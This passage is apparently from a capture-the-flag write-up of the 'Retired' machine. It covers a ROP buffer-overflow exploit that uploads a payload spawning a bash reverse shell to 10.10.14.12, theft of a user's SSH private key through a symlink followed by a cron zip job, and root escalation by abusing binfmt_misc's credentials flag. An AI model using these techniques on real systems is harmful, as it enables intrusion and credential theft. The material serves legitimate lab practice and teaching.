    url = f'{url}/index.php?page=/proc/{pid}/maps'
    r = requests.get(url, allow_redirects=False, proxies=proxy)

    return r.text.split('\n')


def grab_bases(vmmap):
    pie_base = vmmap[0].split('-')[0]
    libc_base = vmmap[24].split('-')[0]

    return int(pie_base, 16), int(libc_base, 16)


offset = b'A'*520

vmmap = grab_vmmap(url, pid)
pie_base, libc_base = grab_bases(vmmap)

log.info(f'PIE base: {hex(pie_base)}')
log.info(f'libc base: {hex(libc_base)}')

libc.address = libc_base
rop_libc = ROP(libc)

pop_rdi = rop_libc.find_gadget(['pop rdi', 'ret'])[0]
pop_rax = rop_libc.find_gadget(['pop rax', 'ret'])[0]
pop_rdx = rop_libc.find_gadget(['pop rdx', 'ret'])[0]
www_gadget = next(libc.search(asm('mov qword ptr [rax], rdx; ret')))

system = libc.symbols['system']
revshell = b'/bin/bash -c "bash -i >& /dev/tcp/10.10.14.12/9001 0>&1"'

# payload = p32(7331, endian='big')
payload = offset

for i in range(0, len(revshell), 8):
    payload += p64(pop_rdx)
    payload += revshell[i:i+8].ljust(8, b'\x00')
    payload += p64(pop_rax)
    payload += p64(pie_base + 0x4010 + i)
    payload += p64(www_gadget)

payload += p64(pop_rdi)
payload += p64(pie_base + 0x4010)
payload += p64(system)

file = {'licensefile': ('payload', payload, 'application/octet-stream')}
r = requests.post(url + '/activate_license.php', files=file, proxies=proxy)
```

The exploit worked neatly on my local setup as well as on remote, and we got a shell.

# Getting user through a running cron job

## zipping a symlink

Once we get a shell, we get dropped in `/var/www`. There we can find a bunch of interesting files:
```console
www-data@retired:~$ ls -la
drwxrwsrwx  3 www-data www-data   4096 Apr  8 12:52 .
drwxr-xr-x 12 root     root       4096 Mar 11 14:36 ..
-rw-------  1 www-data www-data     63 Apr  8 12:48 .bash_history
-rw-r--r--  1 dev      www-data 505153 Apr  8 12:50 2022-04-08_12-50-07-html.zip
-rw-r--r--  1 dev      www-data 505153 Apr  8 12:51 2022-04-08_12-51-07-html.zip
-rw-r--r--  1 dev      www-data 505153 Apr  8 12:52 2022-04-08_12-52-07-html.zip
drwxrwsrwx  5 www-data www-data   4096 Mar 11 14:36 html
-rw-r--r--  1 www-data www-data  12288 Apr  8 12:47 license.sqlite
```

Let's look at the current time:
```console
www-data@retired:~$ date
Fri Apr  8 12:53:00 UTC 2022
```

It seems that a cron job is running, responsible for creating these files every minute.  
If we look at `pspy`, we would not be able to find anything. Perhaps `/proc` has been mounted with the `hidepid` option; that would explain this behaviour.  
If we peek inside those zip files, we would learn that the `/var/www/html` directory is getting zipped.

Notice that the cron is running as the user `dev`. We can take advantage of an odd behaviour of `zip` to get the user's `id_rsa`. By default, when `zip` encounters a symlink, it compresses and stores the file referred to by the link.

Hence, we can run:
```console
www-data@retired:~$ ln -s /home/dev/.ssh/id_rsa /var/www/html/js/key
```
After a while, a new zip file gets created, and it contains `dev`'s `id_rsa`

We can use it to gain a shell as user and get user flag:
```console
opcode@parrot$ chmod 600 id_rsa
opcode@parrot$ ssh -i id_rsa dev@retired.htb
```

# Getting root

## `binfmt_misc`'s `credentials` option

In `/home/dev`, we have an `emuemu` directory. There we have:
```console
dev@retired:~/emuemu$ ls
Makefile  README.md  emuemu  emuemu.c  reg_helper  reg_helper.c  test
```

Let's look at the `Makefile`:
```sh
CC := gcc
CFLAGS := -std=c99 -Wall -Werror -Wextra -Wpedantic -Wconversion -Wsign-conversion

SOURCES := $(wildcard *.c)
TARGETS := $(SOURCES:.c=)

.PHONY: install clean

install: $(TARGETS)
    @echo "[+] Installing program files"
    install --mode 0755 emuemu /usr/bin/
    mkdir --parent --mode 0755 /usr/lib/emuemu /usr/lib/binfmt.d
    install --mode 0750 --group dev reg_helper /usr/lib/emuemu/
    setcap cap_dac_override=ep /usr/lib/emuemu/reg_helper

    @echo "[+] Register OSTRICH ROMs for execution with EMUEMU"
    echo ':EMUEMU:M::\x13\x37OSTRICH\x00ROM\x00::/usr/bin/emuemu:' \
        | tee /usr/lib/binfmt.d/emuemu.conf \
        | /usr/lib/emuemu/reg_helper

clean:
    rm -f -- $(TARGETS)
```

We should note that `cap_dac_override` capability is being given to `/usr/lib/emuemu/reg_helper`

The `emuemu.c` binary is boring:
```c
#include <stdio.h>

/* currently this is only a dummy implementation doing nothing */

int main(void) {
    puts("EMUEMU is still under development.");
    return 1;
}
```

On the other hand, `reg_helper.c` looks interesting:
```c
#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    char cmd[512] = { 0 };

    read(STDIN_FILENO, cmd, sizeof(cmd)); cmd[-1] = 0;

    int fd = open("/proc/sys/fs/binfmt_misc/register", O_WRONLY);
    if (-1 == fd)
        perror("open");
    if (write(fd, cmd, strnlen(cmd,sizeof(cmd))) == -1)
        perror("write");
    if (close(fd) == -1)
        perror("close");

    return 0;
}
```
The `/usr/lib/emuemu/reg_helper` binary could allow us to write to `/proc/sys/fs/binfmt_misc/register`

If we google "/proc/sys/fs/binfmt_misc/register exploit", we'd find this PoC:  
https://github.com/toffan/binfmt_misc

Running it fails with an error. We need to learn more about `binfmt_misc`

Wikipedia says:
> **binfmt_misc** (Miscellaneous Binary Format) is a capability of the Linux kernel which allows arbitrary executable file formats to be recognized and passed to certain user space applications, such as emulators and virtual machines. It is one of a number of binary format handlers in the kernel that are involved in preparing a user-space program to run.

The `/proc/sys/fs/binfmt_misc/register` file contains lines which define executable types to be handled. Each line is of the form:
```
:name:type:offset:magic:mask:interpreter:flags
```

If we go through https://www.kernel.org/doc/html/latest/admin-guide/binfmt-misc.html, we would learn about the **C flag**:
```
C - credentials
Currently, the behavior of binfmt_misc is to calculate the credentials and security token of the new process according to the interpreter. When this flag is included, these attributes are calculated according to the binary. It also implies the O flag. This feature should be used with care as the interpreter will run with root permissions when a setuid binary owned by root is run with binfmt_misc.
```

I do not understand all of it, but we can make some guesses by going through the Wikipedia page and that PoC script.  
Take it with a grain of salt, but I think `/proc/sys/fs/binfmt_misc/register` defines which binary (usually an emulator or a VM) has to be used when files with a specific signature (magic bytes or extension) are being executed.  
Hence, we can pick a random SUID binary, note down its initial 100 bytes or so, and declare a rule in `/proc/sys/fs/binfmt_misc/register` for files with those 100 bytes as their magic bytes.  
Then we can create our "handler binary", which contains some malicious code to spawn a shell and add it to that rule. Now, the kernel knows that our binary is responsible for handling that SUID binary if it is executed.  
Usually, it would not lead to privilege escalation, but that `C` flag makes it so that even the handler binary is run with root permissions if the target binary is SUID.

As for exploitation, we need to grab this exploit: https://github.com/toffan/binfmt_misc and get rid of lines which check if we have write access to `/proc/sys/fs/binfmt_misc/register`. (We cannot write to it directly, we can only do it through the `/usr/lib/emuemu/reg_helper` binary)  
We also need to modify the lines of code which write to `/proc/sys/fs/binfmt_misc/register` and make sure they use `/usr/lib/emuemu/reg_helper` binary instead.  
You can find the modified script here: [binfmt_rootkit](binfmt_rootkit)

We can now run this script to get a shell as root.
